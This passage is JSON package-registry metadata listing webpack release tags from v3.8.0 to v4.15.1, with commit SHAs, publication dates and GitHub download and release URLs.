05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"